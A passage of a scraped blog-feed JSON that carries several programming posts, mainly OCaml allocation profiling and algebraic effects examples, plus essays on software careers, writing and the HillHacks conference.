concmap\nfunction,\nwhich in turn invokes the List.map function on queens.ml:61. We’ve now\npinned down the source of the allocation in list.ml:55 to queens.ml:61.\nCaveats and conclusions\nUnlike stack profiles of C programs, OCaml’s stack profile does not include all\nthe functions in the call stack since many calls are in tail positions. Calls\nto functions at tail position will not have a frame on the stack, and hence\nwill not be included in the profile.\nPlease do submit issues and bug-fixes. Pull-requests are welcome! Also, here is\nmy trimmed down (yay \\o\u002F!), non-exhaustive wish list of features:\nDump the profile every few milliseconds to study the allocation behavior of\nprograms over time.\nSave the location information in the object\nheader\nand dump the heap at every GC to catch space leaks.\nThanks to trevorsummerssmith for the example. ↩",[],{"slug":2717,"title":2718,"link":2719,"pubDate":2720,"contentSnippet":2721,"tags":2722,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"get-better-at-software-development","How to get better at software development?","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2015\u002F10\u002F12\u002Fget-better-at-software-development\u002F","2015-10-12T00:00:00.000Z","I often get a lot of queries from people asking me about how to get started with software development, and how to get better at it. My replies are almost reaching stock-level worthy of copy-paste now, so I thought I might as well write about it publicly.\nWhat follows is a list of advice I’d give to any person who wants to write software for a living. A lot of it might apply across professions, and a lot of it is tailored to students in universtities. Not everything might apply in your case, YMMV. Take everything with a pinch of salt. Feedback is welcome.\nJoin a community.\nHighly preferable if its an IRL (In-real-life) community rather than just a chatroom somewhere, but even those are preferable over nothing. Communities have this shared sense of learning, that you don’t enjoy anywhere else. Passive learning is something I talk a lot about, and it only happens because of chance interactions that happen in communities. Even online communities work fairly well, and by online communities I mean places like StackOverflow, AskUbuntu, ServerFault, HackerNews, subreddits etc.\nIf you don’t have a physical community near you that you can join, maybe its time to start one?\nContribute to Open Source projects\nIt doesn’t have to be with your code, or even a large project. Even small javascript npm modules that you might think can be improved deserve some Pull Request love.\nWrite all code publicly\nYour code not being public should be the exception, not the norm. I’ve found putting almost all my code on github fairly liberating. I keep all my OS configuration and a lot of other things on github.\nDo tech talks\nIt doesn’t have to be at a big-name conference, but maybe at a small meetup around you. Good conferences will sponsor your tickets, and as a plus, you get to attend all the talks at that conference for free. Just make sure that you actually do know what you’re talking about, unlike a lot of talks that happen.\nThe level of knowledge expected of a speaker is far more, and as a result if you are the one talking about something, you need to get better at it and understand it better, which is a great way of forcing yourself to learn something.\nStay Updated\nReading Hacker News is a fairly certain way of making sure of that. A person doing PHP development should be aware of things like Composer, HHVM, and perhaps the upcoming changes in PHP7 (They’re awesome). As a technologist, part of our job is to stay updated with trends (no matter how insane the JS framework wars sound). The code you will be writing 5 years from now will be in an entirely different framework than what you are using today. This doesn’t mean that you should start learning the ins and outs of every JS framework, but rather that you should be tangentially aware of developments happening in the space. (For eg, following stable updates of Rails even though you are not a Rails developer).\nLearn more languages\nI am a proud polyglot, and I very often realize that knowing more than one language changes your style and more importantly your thinking process significantly. For eg, a Ruby programmer will be fairly comfortable with the idea of metaprogramming compared to a PHP developer, and even more so when it might come to DSL (Domain Specific Languages). Similarly, knowing Haskell or Functional Programming in general teaches you a lot of things that you might re-use back in your JavaScript world.   \nConcepts Matter\nI was asking people about good interview questions, and one that I really liked was “How do you write an HTTP server using sockets?”. A lot of developers are stuck in this moat of “programming = software development”. And you can’t get over that unless you start thinking in terms of concepts. This is not me trying to get people to become Architecture Astronauts, but me trying to get people to understand how things work.\nI’ve interviewed people who have no idea about how HTTP works, and in my opinion you can’t really be a web developer without knowing HTTP. A fairly good filter for good web developers is whether they know the ins-and-outs of HTTP. And HTTP is not a programming challenge, but rather a conceptual problem.\nSimilarly, if you work in the frontend, and you don’t know what the Same Origin Policy is, I am not gonna hire you. (“Is it implemented on the browser or the server?” is a another good question). The point I’m trying to make is that you need to get a layer above your language’s standard library and understand how things work. Learning ActiveRecord is awesome, but do you understand how it works?\nShip Products\nDoesn’t matter if they are small, or made in a hackathon. As long as its shipped, we’re cool. If its not, come back when you’ve shipped it.\nHave side projects\nThis is slightly harder to do, but far more rewarding. Make sure that your side-project is not something you expect to make money out of, and that it has a fairly reasonable scope. Side projects are an excellent breeding ground for you to try out new technologies, and play around with new languages. Its a really good breakaway from work-things as well, on top of that.\nRead technical books\nAs a start, I’d recommend everything that codinghorror has suggested here and here. There are a lot of good books listed on hackershelf.com as well. My personal favorite is Don’t Make Me Think, which is a book on Web Usability and something I think every developer and designer should be forced to read.\nThanks to Shashank Mehta for discussing these ideas\nwith me and helping me frame this post.",[],{"slug":2724,"title":2725,"link":2726,"pubDate":2727,"contentSnippet":2728,"tags":2729,"maintainerName":349,"maintainerUsername":350,"maintainerPhoto":351,"feedUrl":352},"bytecode-allocation-profiler","An Allocation Profiler for OCaml Bytecode Interpreter","https:\u002F\u002Fkcsrk.info\u002Focaml\u002Fprofiling\u002F2015\u002F09\u002F23\u002Fbytecode-allocation-profiler\u002F","2015-09-23T09:51:30.000Z","This post describes a simple flat allocation profiler for OCaml 4.02 bytecode\ninterpreter.\nOCaml is a strongly typed functional language with automatic memory management.\nAutomatic memory management alleviates the need to manually deal with memory\nmemory management, and by construction, avoids a large class of bugs. However,\nabstractions are not free in OCaml. Unlike MLton, a\nwhole-program optimizing Standard ML compiler, which I used to hack on in an\nearlier life, in OCaml, one\nneeds to be particularly aware of the cost of introducing abstractions such as\nhigher-order functions and modules. This is often at odds with desirable\nprogramming patterns one tends to embrace in a higher-order modular functional\nlanguage. Writing performance sensitive code in OCaml remains a skill that is\nacquired gradually through experience.\nThere are of course, excellent\nresources\navailable\nto understand the performance implications of OCaml abstractions. However,\noften times, I simply need a way to profile and uncover performance bottlenecks\nin my program, before I can apply any targeted optimizations. Profiling along\nthe following three axes are particularly useful: time, counts and\nallocations. OCaml has good support for two of\nthese. While ocamlcp\nwith ocamlprof gives you count profile, one can use the standard Unix\nprofiler gprof for time profiling. However, these do not necessarily help\nwith identifying the cost of abstractions, for which one needs an allocation\nprofiler1.\nThe state of allocation profiling in OCaml\nWhile allocation profiler is not part of the standard OCaml distribution,\nseveral alternatives do exist. Memprof from\nOCamlPro provides “non-intrusive memory profiler\nfor OCaml applications”, with a simple online version and a commercial version\nwith fine-grained tracing. Mark Shinwell has an allocation profiler for OCaml\n4.02 native\ncode programs generated by ocamlopt. Unfortunately, neither of these options\nwere suitable for me as the Multicore\nOCaml currently only supports\nbytecode compilation, and has a\nmarkedly\ndifferent\nGC. So I decided to implement my\nown for the multicore\ncompiler.\nSince the allocation profiler will be useful in general, I have also ported it\nto OCaml 4.02.\nThis post talks about the vanilla OCaml allocation profiler.\nBytecode allocation profiler\nThe idea of this allocation profiler is to record the allocations and associate\nthem with the position in the code where the corresponding block or closure was\nallocated. In particular, we do not record the call stack that led to the\nallocation point, which would have provided us a more accurate picture. One can\nget pretty far with just the flat profile. Running the bytecode program under\nthe modified interpreter produces a profile, which is then analyzed offline.\nThe bytecode interpreter of OCaml is remarkably simple, as is the patch for the\nallocation profiler. In this section, I will detail the implementation of the\nprofiler. If you are interested in just using the profiler, do skip right to\nthe instructions.\nWhen the bytecode is loaded by the interpreter in\ncaml_load_code,\nit allocates an array for the bytecode. caml_start_code points to the start\nof this array. The program counter\npc\nis a pointer into this array. We maintain a distinct code pointer\nprofile_pc\nthat always points to the instruction and never its operands. The offset of\nprofile_pc from caml_start_code uniquely identifies a instruction in the\nbytecode executable. We will use this offset to record the allocation points.\nWe allocate an array\ncaml_profile_counts\nof unsigned integers whose length is equal to the length of the code, into\nwhich we will store the allocation counts. There are two main ways in which\nOCaml allocates memory;\nAlloc_small\nfor allocating in minor heap, and\ncaml_alloc_shr\nfor allocating in major heap. We modify both to record the allocations at a\ngiven instruction. We modify\ninterp.c\nto update profile_pc for instructions which potentially allocate. Allocations\nfor arrays and strings are performed in their corresponding C functions through\ncaml_alloc.\nSuch allocations are covered by recording the instruction in\nSetup_for_c_call.\ncaml_alloc_shr is also used by the GC for promoting live minor heap objects\nto major heap at the end of a minor GC cycle. Allocations by GC is ignored by\nresetting profile_pc to NULL before minor collections. Hence, the profiler\nonly counts allocations by the mutator. Finally, the interpreter outputs the\nprofile\nat the end of execution of the program.\n \n#Using the profiler\nIn order to use the profiler, compile the OCaml programs with the bytecode\ncompiler ocamlc with -g option to record the debugging information. This\nwill be used to interpret the profile. When using ocamlbuild it is necessary\nto compile and link with -g (with -cflag -g -lflag -g).\nFirst, get OCaml 4.02 with the allocation profiler, and build it using\nopam-compiler-conf:\n$ git clone https:\u002F\u002Fgithub.com\u002Fkayceesrk\u002Focaml\n$ cd ocaml\n$ git checkout 4.02-profile-alloc\n$ opam compiler-conf configure\n$ make world.opt\n$ opam compiler-conf install\n\n\nLet us profile the Eight\nQueens\nprogram. Profiling is enabled by setting the CAML_PROFILE_ALLOC to the output\nfilename of the profile.\n$ wget http:\u002F\u002Fcaml.inria.fr\u002Fpub\u002Fold_caml_site\u002FExamples\u002Foc\u002Fbasics\u002Fqueens.ml\n$ ocamlc -o queens -g queens.ml\n$ CAML_PROFILE_ALLOC=queens.preprof .\u002Fqueens\nChess boards's size ? 8\nThe 8 queens problem has 92 solutions.\n\nDo you want to see the solutions \u003Cn\u002Fy> ? n\n$ .\u002Ftools\u002Fallocprof queens.preprof > queens.prof\n$ head -n5 queens.prof\nTotal: 80,433 words\nInstr   Words   % of total\n-----   -----   ----------\n2488    31440   39.09%\n27681   31440   39.09%\n\n\nallocprof is a small python script that post-processes the profile. The\npost-processed profile shows the total number of words allocated, and is\nfollowed by the instruction number, words allocated and the percentage of total\nallocation that it represents. The instruction number can be linked back to the\nsource code by dumping the bytecode executable with dumpobj.\n$ .\u002Ftools\u002Fdumpobj queens > queens.dumpobj\n$ vim queens.prof queens.dump queens.ml\n\n\n\nWe can see that the program spent 39.09% of allocations for appending to lists\nin queens.ml line 61. For the curious, the other 39.09% was spent in\nList.map function.\nDealing with early termination\n \n\nThe profiler normally writes out the profile at the end of the standard program\ntermination, when the interpreter has run to completion. However, programs may\nterminate early by explicitly invoking exit. In such cases, the runtime does\nnot get a chance to output the profile. Hence, a function output_profile: unit\n-> unit is provided to explicitly request the profile to be written out to the\nfilename provided in CAML_PROFILE_ALLOC. The following example illustrates\nthe use case in a program that uses the Async library:\n(* foo.ml *)\nopen Core.Std\nopen Async.Std\n\nlet main () =\n  printf \"Hello!\\n\";\n  (* Without this call, profile isn't written out *)\n  output_profile ();\n  return ()\n\nlet () =\n  Command.async_basic\n    ~summary:\"foo\"\n    Command.Spec.(empty)\n    main\n  |> Command.run\n\n\nThe program is compiled and run as follows:\n$ ocamlbuild -use-ocamlfind foo.byte -package core -package async -tag thread -tag debug\nFinished, 3 targets (0 cached) in 00:00:00.\n$ CAML_PROFILE_ALLOC=foo.preprof .\u002Ffoo.byte\nHello!\n$ ls foo.preprof\nfoo.preprof\n\n\nThanks to trevorsummerssmith for the\nmotivation and the example.\nConclusion\nThe allocation profiler has been quite useful for optimizing small programs. It\nwould be interesting to see whether it scales to larger ones. Also, here is my\n(non-exhaustive) wish list of features:\nImprove tooling. Avoid the need to manually search through text files.\nRecord stack allocation. This is especially important in multicore OCaml\n  since stacks are heap allocated.\nRecord the call stack information for allocations to get an informative profile.\nDump the profile every few milliseconds to study the allocation behavior of\n  programs over time.\nSave the location information in the object\n  header\n  and dump the heap at every GC to catch space leaks.\nProfiling for time does give you the time that the program spends in garbage collection functions such as minor GC cycles and major GC slices, but are not helpful for pinpointing allocation bottlenecks. ↩",[],{"slug":2731,"title":2732,"link":2733,"pubDate":2734,"contentSnippet":2735,"tags":2736,"maintainerName":349,"maintainerUsername":350,"maintainerPhoto":351,"feedUrl":352},"ocaml-experimental-compilers","Experiment with OCaml Multicore and Algebraic Effects","https:\u002F\u002Fkcsrk.info\u002Fmulticore\u002Fopam\u002Focaml\u002F2015\u002F09\u002F10\u002Focaml-experimental-compilers\u002F","2015-09-10T13:11:00.000Z","I recently gave a talk on Algebraic Effects in OCaml at the OCaml Workshop\n2015. The extended abstract and the\nslides from the talk are available here. The slides\nshould provide a gentle introduction to programming with algebraic effects and\nhandlers in OCaml. The examples from the talk (and many more!) are available\nhere.\nAlgebraic effects in OCaml are available as a part of the multicore OCaml. The\nexperimental compiler could easily be installed using the OCaml Labs opam\ndevelopment repo.\n$ opam remote add ocamllabs -k git https:\u002F\u002Fgithub.com\u002Focamllabs\u002Fopam-repo-dev\n$ opam switch 4.02.2+multicore\n\n\nIf you are interested in contributing, please do experiment with algebraic\neffects, and report any inevitable bugs or feature requests to the multicore\nOCaml issue tracker.\nWe are also quite interested in hearing interesting applications of algebraic\neffects such as the encoding of monadic\nreflection\nand one-shot multi-prompt delimited\ncontrol.\nFeel free to submit pull requests with your examples.",[],{"slug":2738,"title":2739,"link":2740,"pubDate":2741,"contentSnippet":2742,"tags":2743,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"hillhacks","HillHacks 2015","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2015\u002F07\u002F20\u002Fhillhacks\u002F","2015-07-20T00:00:00.000Z","A little while back, I came across HillHacks, a conference in Dharamshala about “hacking and making in the Himalayas”. I was instantly hooked. It took a lot of scheduling troubles, but I decided to stay for the entire unconference, which started at 23rd May.\nIts hard to describe the HillHacks experience in a single blog post. I met so many amazing people from all over the world. Learned a lot of different things. I Had a lot of fun teaching some other things. I helped organize some of the stuff, and managed to stay awake an entire night while participating in an CTF. And on top of that, got to eat delicious food.\nHillHacks as an event, was divided into two segments:\nAn unconference (23rd May - 3rd June)\nMain Conference (4-7 June)\nA lot of people had arrived before me at the venue and taken care of the basic infrastructure. We had internet connectivity via two local ISPs. We had IPV6 connectivity via a tunnel in Belgium as well.\nThere were a lot of fun activities planned everyday: from unicycling to skateboarding and playing Cards against Humanity; it was a lot of fun living with so many strangers and trying to figure out ways to help.\nI did a talk on SDSLabs, a quiz for everyone, and an introductory session on CTF contests. We then participated in a CTF organized in Germany as Team HillHacks. On the last day of the conference, I did a [talk][josd-talk] on “The Joy of Software Development”, which is a book I am working on.\nFor the first time in my life, I met people who actually use BSD. And to make it even more amazing, I met NetBSD Kernel developers, people on the BSD Security Team, and people who prefer OpenBSD over NetBSD (I’d never really cared for the distinction, as a Linux user)\nWe did a lot of hacks, including running an MPD Daemon and streaming it over IceCast. I also spent a lot of time cubing and teaching people how to solve Rubik Cubes. My times have also improved somewhat as a result. Thanks to trouble, I also learnt how to solve a MegaMinx.\nAs part of the School Outreach program (organized by the brilliant Tink), we taught kids about Codes and Ciphers, programming, speedcubing and lots of other things. The kids also performed in the final Gala Show giving us brilliant performances in 3 different plays (all 3 schools had their own plays).\nI learned a lot of different things: how to start with Kernel Programming, DNSSEC, Retro Gaming. Thanks to a few dedicated volunteers, we even made a 8-inch Telescope that made staring at the night sky so much fun. We had a session on Typography, a story telling session in Malayalam (translated to English on the fly). I even learnt a bit of Emacs.\nThe list is so long, I don’t think I can do it justice in this single blog post.\nThe most amazing part was not the technical things, but the community itself. sva would often say that everyone of us has “sudo access on the conference” (geekspeak for full authority). Each of us helped organize it, any way we could. The community got together to setup the stage, tents, network and the entire infrastructure at HillHacks. Zainab even has a blog post on social cooking at Hillhacks.\nAs I sit here at the venue, it has been 2 weeks of fun and awesomeness here at HillHacks. I leave with lots of memories and hope to be here next year.\nIf this blog post interests you, be sure to check out hackbeach as well. We are doing a mini-conference around November in Kovalam.",[],{"slug":2745,"title":2746,"link":2747,"pubDate":2748,"contentSnippet":2749,"tags":2750,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"on-writing","Thoughts on Writing","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2015\u002F06\u002F07\u002Fon-writing\u002F","2015-06-07T00:00:00.000Z","I have always wanted to be a writer. I think secretly us all reader-folk have that ambition. The joy of getting across your thoughts to another person without ever having met them is enormous.\nMost of my writing time these days is spent over email, chat or my not-so-frequent blog posts. I tend to do a lot of research while writing, and it takes up a lot of time. As such, my writing output tends to be diminutive compared to what I’d like.\nHowever, if you’ll go through my blog posts and emails, I write a lot about trivial things. Things that many people have already written about. Things that have probably been discussed to death, and where I have very little chance of actually coming up with something new.\nShould I still go ahead and write about it?\nThis question has been bugging me for a while, especially as a blogger. I mostly write on technical topics these days. For instance, I have given talks on [Software Development], [UX Design], and even [Bitcoin]. I am nowhere close to being an authority on any of these things. Even in my specialized field of Web Development, there are so many things that I’m only barely aware about. So many things I am yet to even form my own opinions about. Topics I don’t even know exist.\nWhen I go and read an article about Software Development from Joel Spolsky, or an article on Security by Bruce Schneier, or something on Startups by Paul Graham, or tptacek on Hacker News; I instantly sit back and take notice: I know their credentials and the fact that they are speaking authoritatively on the topic. However, what can I, a meager undergrad with almost zero experience, write on such topics. Why should I even try, when there are people hundreds of time better who understand these things a thousand times better than me.\nIn retrospect, this sounds quite similar to the Imposter Syndrome; and I’m not sure if this is exactly the same thing. I don’t get a feeling that I’m a fraud. I totally understand my own capabilities and successes, but the mere fact that there are people far better at what I’m doing is enough to dis-hearten me.\nI’ve given this a lot of thought. A really good summary of my response is in the following answer by James Erwin, author of Rome Sweet Rome in a reddit AMA to a question asking for writer advice:\nAnd if you’re going to write, write what you want to write. The odds against any creator are insane. If you’re going to devote months of your time, don’t let it be for an idea you think will sell. Odds are it won’t. Write something you want to write, or need to write. Write for yourself before anyone else. I’d rather read someone who is excited and passionate about what they want to say than someone who’s obviously trying to say what they think I want to hear.\n— James Erwin\nI write, despite all these doubts, for the following reasons:\nSelf-learning. A blog is an excellent way to keep track of your self-learning. Its amazing to come back a few years later and see the things you were struggling with before. Its equally amazing to do a trivial google search for an issue you face and find your own blog post or stackoverflow answer on the same.\nSharing Knowledge. Yes, there are people who might know it better, but that shouldn’t mean I should keep my knowledge to myself. That would go against all the values that I stand for.\nNetwork Effect: Not in the strictest sense of the word, but my friend Shashank recently brought this up. I have a circle of people who know me and would vouch for my credentials. For the same reason, they are more likely to trust me as source, instead of a third person who they have no knowledge of.\nI love writing. The mere process of putting words down is enchanting for me.\nThe next question that rises is: “What should I write about?”. Ruling out things I have no clue about, that still leaves a large number of topics I can cover. I am interested in UX Design, Hackers, Computer Security, Software Development, rationalism, skepticism, Free and Open Source movements, Political activism, Technocracy with a passing interest in several other fields such as cosmology and geek culture.\nI am not going to pick one every day and write about something new. I don’t want to write something rubbish just for the sake of writing it. I ultimately want to write because I have something to say. It doesn’t have to be unique or ground-breaking. What matters is that I want to write about it.\nA few days back someone contacted me on facebook asking me advice on getting started with web development. I get a lot of these queries, mostly over facebook, email, and quora. Our conversation went back and forth with me suggesting resources, and he getting exceedingly confused over whether he should use codecademy or udacity, or coursera or something else.\nI have devoted a lot of time in my life to teaching people the nuances of these things. I have mentored many people, and acutely know the issues a beginner faces. In turn, I had an amazing mentor who taught me the importance of always learning things.\nAll of this lead me to realize one fact: I have been writing a lot about Software Development. Unfortunately, a lot of it is in private emails and chat. And I wanna write more about it, on a public medium.\nSo, I’m announcing the next thing I’m working on: a book called The Joy of Software Development. A few obligatory links:\nThe source code is available on GitHub.\nIts licensed under the CC-by-SA 4.0 license.\nThe canonical url for the site is https:\u002F\u002Fjosd.captnemo.in\u002F\nIts hosted on the excellent GitBook platform, which automatically publishes each version as epub, mobi, and pdf as well.\nWho the target audience for the book is.\nYou can file an issue for critique on GitHub\nAs expected, all the development, writing, and discussion on the book will be in the public, mostly on GitHub. I am writing this book, because I feel it needs to be written. I don’t expect it to be published, but that won’t stop me from writing it.\nArtur Siekielski recently came across it, and wrote the following:\nThe book you’re writing looks very good! It’s filling a niche as I don’t think there are any modern books that focus on “bird’s eye view”, and I see it would be helpful for many programmers to refresh knowledge.\nThat gave me a bit of validation, as the only person who’d read it so far were my close friends.\nIf you wanna support its development, you can do one of the following:\nPoke me on twitter or email and let me know you want to read it\nSubscribe to the mailing list (I’ll send out updates there)\nWatch or Star the repo on GitHub.\nSee the CONTRIBUTING file on github for contributing to the text.\nAsking for Donations might sound weird to some. I don’t really need the money, but I think I’d get an additional sense of responsibility towards finishing it if people start giving me money. I will be donating the entire proceedings to EFF.",[],{"slug":2752,"title":2753,"link":2754,"pubDate":2755,"contentSnippet":2756,"tags":2757,"maintainerName":349,"maintainerUsername":350,"maintainerPhoto":351,"feedUrl":352},"more-effects","Pearls of Algebraic Effects and Handlers","https:\u002F\u002Fkcsrk.info\u002Focaml\u002Fmulticore\u002Feffects\u002F2015\u002F05\u002F27\u002Fmore-effects\u002F","2015-05-27T14:06:00.000Z","In the previous\npost, I\npresented a simple cooperative multithreaded scheduler written using algebraic\neffects and their handlers. Algebraic effects are of course useful for\nexpressing other forms of effectful computations. In this post, I will present\na series of simple examples to illustrate the utility of algebraic effects and\nhandlers in OCaml. Some of the examples presented here were borrowed from the\nexcellent paper on Eff programming language1. All of the examples\npresented below are available\nhere.\nState\nWe can use algebraic effects to model stateful\ncomputation,\nwith the ability to retrieve (get) and update (put) the current state:\nmodule type STATE = sig\n  type t\n  val put : t -> unit\n  val get : unit -> t\n  val run : (unit -> unit) -> init:t -> unit\nend\n\n\nThe function run runs a stateful computation with the given initial state.\nHere is the implementation of the module State which provides the desired\nbehaviour:\n\n\n\n1\n2\n3\n4\n5\n6\n7\n8\n9\n10\n11\n12\n13\n14\n15\n16\n17\n\nmodule State (S : sig type t end) : STATE with type t = S.t = struct\n  type t = S.t\n\n  effect Put : t -> unit\n  let put v = perform (Put v)\n\n  effect Get : t\n  let get () = perform Get\n\n  let run f ~init =\n    let comp =\n      match f () with\n      | () -> (fun s -> ())\n      | effect (Put s') k -> (fun s -> continue k () s')\n      | effect Get k -> (fun s -> continue k s s)\n    in comp init\nend\n\n\n\n\n\nThe key idea here is that the handler converts the stateful computation to\nfunctions that accept the state. For example, observe that if the function f\nreturns a unit value (line 13), we return a function which accepts a state\ns and returns unit. The handler for effect Get (line 15) passes the current state s\nto the continuation k. The expression continue k s returns a function that\naccepts the current state and returns unit. Since fetching the current state\ndoes not modify it, we apply this function to s, the original state. Since\nPut modifies the state (line 14), the function returned by continue k () is applied\nto the new state s'. We evaluate the computation by applying it to the initial\nstate init (line 16).\nObserve that the implementation of the handler for the stateful computation is\nsimilar to the implementation of State\nmonad in Haskell. Except\nthat in Haskell, you would have the stateful computation f have the type\nState t (), which says that f is a stateful computation where t is the\ntype of state and  () the type of return value. Since multicore OCaml does\nnot have a effect system, f simply has type unit -> unit as opposed to\nbeing explicitly tagged with the effects being performed. While the OCaml type\nof f under specifies the behaviour of f, it does allow you to combine various\nkinds of effects directly, without the need for monad transformer\ngymnastics2. For example, the following code snippet combines an int\nand string typed state computations, each with its own handler:\nmodule IS = State (struct type t = int end)\nmodule SS = State (struct type t = string end)\n\nlet foo () : unit =\n  printf \"%d\\n\" (IS.get ());\n  IS.put 42;\n  printf \"%d\\n\" (IS.get ());\n  IS.put 21;\n  printf \"%d\\n\" (IS.get ());\n  SS.put \"hello\";\n  printf \"%s\\n\" (SS.get ());\n  SS.put \"world\";\n  printf \"%s\\n\" (SS.get ())\n\nlet _ = IS.run (fun () -> SS.run foo \"\") 0\n\n\nwhich prints:\n0\n42\n21\nhello\nworld\n\n\nReferences\nWe can expand upon our state example, to model ML style\nreferences:\nmodule State : sig\n    type 'a t\n\n    val ref  : 'a -> 'a t\n    val (!)  : 'a t -> 'a\n    val (:=) : 'a t -> 'a -> unit\n\n    val run  : (unit -> 'a) -> 'a\n  end = struct\n\n  type 'a t = {inj : 'a -> Univ.t; prj : Univ.t -> 'a option}\n\n  effect Ref : 'a -> 'a t\n  let ref v = perform (Ref v)\n\n  effect Read : 'a t -> 'a\n  let (!) = fun r -> perform (Read r)\n\n  effect Write : 'a t * 'a -> unit\n  let (:=) = fun r v -> perform (Write (r,v))\n\n  let run f =\n    let comp =\n      match f () with\n      | v -> (fun s -> v)\n      | effect (Ref v) k -> (fun s ->\n          let (inj, prj) = Univ.embed () in\n          let cont = continue k {inj;prj} in\n          cont (inj v::s))\n      | effect (Read {inj; prj}) k -> (fun s ->\n          match find prj s with\n          | Some v -> continue k v s\n          | None -> failwith \"Ref.run: Impossible -> ref not found\")\n      | effect (Write ({inj; prj}, v)) k -> (fun s ->\n          continue k () (inj v::s))\n    in comp []\nend\n\n\nThe idea is to represent the state as a list of universal typed values,\nreferences as a record with inject and project functions to and from universal\ntype values, assign as appending a new value to the head of the state list, and\ndereference as linear search through the list for a matching assignment. The\nuniversal type\nimplementation is\ndue to Alan Frisch.\nTransactions\nWe may handle lookup and update to implement\ntransactions\nthat discards the updates to references in case an exception occurs:\n  let atomically f =\n    let comp =\n      match f () with\n      | x -> (fun _ -> x)\n      | exception e -> (fun rb -> rb (); raise e)\n      | effect (Update (r,v)) k -> (fun rb ->\n          let old_v = !r in\n          r := v;\n          continue k () (fun () -> r := old_v; rb ()))\n    in comp (fun () -> ())\n\n\nUpdating a reference builds up a rollback function that negates the effect of\nthe update. In case of an exception, the rollback function is evaluated before\nre-raising the exception. For example, in the following code snippet:\nexception Res of int\n\nlet () = atomically (fun () -> (* T0 *)\n  let r = ref 10 in\n  printf \"T0: %d\\n\" (!r);\n  try atomically (fun () -> (* T1 *)\n    r := 20;\n    r := 21;\n    printf \"T1: Before abort %d\\n\" (!r);\n    raise (Res !r);\n    printf \"T1: After abort %d\\n\" (!r);\n    r := 30)\n  with\n  | Res v -> printf \"T0: T1 aborted with %d\\n\" v;\n  printf \"T0: %d\\n\" !r)\n\n\nthe updates to reference r by transaction T1 are discarded on exception and\nthe program prints the following:\nT0: 10\nT1: Before abort 21\nT0: T1 aborted with 21\nT0: 10\n\n\nFrom Iterators to Generators\nAn iterator is a fold-function of type ('a -> unit) -> unit, that iterates a\nclient function over all the elements of a data structure. A generator is a\nfunction of type unit -> 'a option that returns Some v each time the\nfunction is invoked, where v is the next-element in the data structure. The\nfunction returns None if the traversal is complete. Unlike an iterator, the\ngenerator hands over control of the traversal to the client of the library.\nGabriel Scherer’s insightful article on generators, iterators, control and\ncontinuations\nnicely distinguish, motivate and provide implementation of different kinds of\niterators and generators for binary trees. While the iterator implementation is\nobvious and straight-forward, the generator implementation requires translating\nthe code to CPS style and manually performing simplifications for efficient\ntraversal. Since algebraic effects handlers give us a handle to the\ncontinuation, we can essentially derive the generator implementation from\nthe\niterator.\nLet us consider a binary tree with the following type:\ntype 'a t = Leaf | Node of 'a t * 'a * 'a t\n\n\nWe can define an iterator that traverses the tree from left to right as follows:\nlet rec iter f = function\n  | Leaf -> ()\n  | Node (l, x, r) -> iter f l; f x; iter f r\n\n\nFrom this iterator, we derive the generator as follows:\n\n\n\n1\n2\n3\n4\n5\n6\n7\n8\n9\n10\n11\n12\n13\n14\n\nlet to_gen (type a) (t : a t) =\n  let module M = struct effect Next : a -> unit end in\n  let open M in\n  let step = ref (fun () -> assert false) in\n  let first_step () =\n    try\n      iter (fun x -> perform (Next x)) t;\n      None\n    with effect (Next v) k ->\n      step := continue k;\n      Some v\n  in\n    step := first_step;\n    fun () -> !step ()\n\n\n\n\n\nAt each step of the iteration, we perform the effect Next : a -> unit (line\n7), which is handled by saving the continuation to a local reference and\nreturning the value (line 9 - 11). Since the effect handlers are provided with\nthe continuation, we are able to invert the control from the library to the\nclient of the library. This avoids the need to perform manual CPS translation.\nDirect-style asynchronous IO\nSince the effect handler has access to the continuation, we can implement\nminimal asynchronous IO in\ndirect-style\nas opposed to the monadic style of asynchronous IO libraries such as Lwt and\nAsync. Our asynchronous IO library has the following interface:\nmodule type AIO = sig\n\n  val fork  : (unit -> unit) -> unit\n  val yield : unit -> unit\n\n  type file_descr = Unix.file_descr\n  type sockaddr = Unix.sockaddr\n  type msg_flag = Unix.msg_flag\n\n  val accept : file_descr -> file_descr * sockaddr\n  val recv   : file_descr -> bytes -> int -> int -> msg_flag list -> int\n  val send   : file_descr -> bytes -> int -> int -> msg_flag list -> int\n  val sleep  : float -> unit\n\n  val run : (unit -> unit) -> unit\nend\n\n\nObserve that the return type of the non-blocking function calls accept,\nrecv, send and sleep are the same as their blocking counterparts from\nUnix module.\nThe asynchronous IO implementation works as follows. For each blocking action,\nif the action can be performed immediately, then it is. Otherwise, the thread\nperforming the blocking task is suspended and add to a pool of threads waiting\nto perform IO:\n(* Block until data is available to read on the socket. *)\neffect Blk_read  : file_descr -> unit\n(* Block until socket is writable. *)\neffect Blk_write : file_descr -> unit\n(* Sleep for given number of seconds. *)\neffect Sleep : float -> unit\n\nlet rec core f =\n  match f () with\n  ...\n  | effect (Blk_read fd) k ->\n      if poll_rd fd then continue k ()\n      else (Hashtbl.add read_ht fd k;\n            dequeue ())\n  | effect (Blk_write fd) k ->\n      if poll_wr fd then continue k ()\n      else (Hashtbl.add write_ht fd k;\n            dequeue ())\n  | effect (Sleep t) k ->\n        if t \u003C= 0. then continue k ()\n        else (Hashtbl.add sleep_ht (Unix.gettimeofday () +. t) k;\n              dequeue ())\n\nlet accept fd =\n  perform (Blk_read fd);\n  Unix.accept fd\n\nlet recv fd buf pos len mode =\n  perform (Blk_read fd);\n  Unix.recv fd buf pos len mode\n\nlet send fd bus pos len mode =\n  perform (Blk_write fd);\n  Unix.send fd bus pos len mode\n\n\nThe scheduler works by running all of the available threads until there are no\nmore threads to run. At this point, if there are threads that are waiting to\ncomplete an IO operation, the scheduler invokes select() call and blocks\nuntil one of the IO actions becomes available. The scheduler then resumes those\nthreads whose IO actions are now available:\n(* When there are no threads to run, perform blocking io. *)\nlet perform_io timeout =\n  let rd_fds = Hashtbl.fold (fun fd _ acc -> fd::acc) read_ht [] in\n  let wr_fds = Hashtbl.fold (fun fd _ acc -> fd::acc) write_ht [] in\n  let rdy_rd_fds, rdy_wr_fds, _ = Unix.select rd_fds wr_fds [] timeout in\n  let rec resume ht = function\n  | [] -> ()\n  | x::xs ->\n      enqueue 